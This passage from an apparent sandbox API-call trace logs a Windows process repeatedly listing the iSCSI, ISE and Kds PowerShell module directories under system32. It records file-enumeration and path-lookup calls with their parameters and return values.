returned 0x39 [0264.855] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.855] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.855] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0264.855] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0264.856] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0264.856] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0264.856] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 1 [0264.856] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.856] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.856] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0264.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.856] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.857] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0264.857] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) returned 0x39 [0264.857] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.857] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.857] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0264.857] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0264.858] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0264.858] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0264.858] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 1 [0264.858] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 0 [0264.858] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.858] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1")) returned 0x20 [0264.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.859] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0264.859] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37 [0264.859] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.859] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.859] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0264.860] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0264.860] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 0 [0264.860] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.860] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0264.860] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37 [0264.860] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbce0 [0264.861] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.861] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0264.861] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0264.861] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.861] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0264.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.861] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0264.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.862] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.862] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0264.862] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37 [0264.862] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.862] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.862] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0264.863] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0264.863] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 0 [0264.863] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.863] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1")) returned 0x20 [0264.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.863] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0264.863] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", lpFilePart=0x0) returned 0x37 [0264.864] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.864] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.864] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 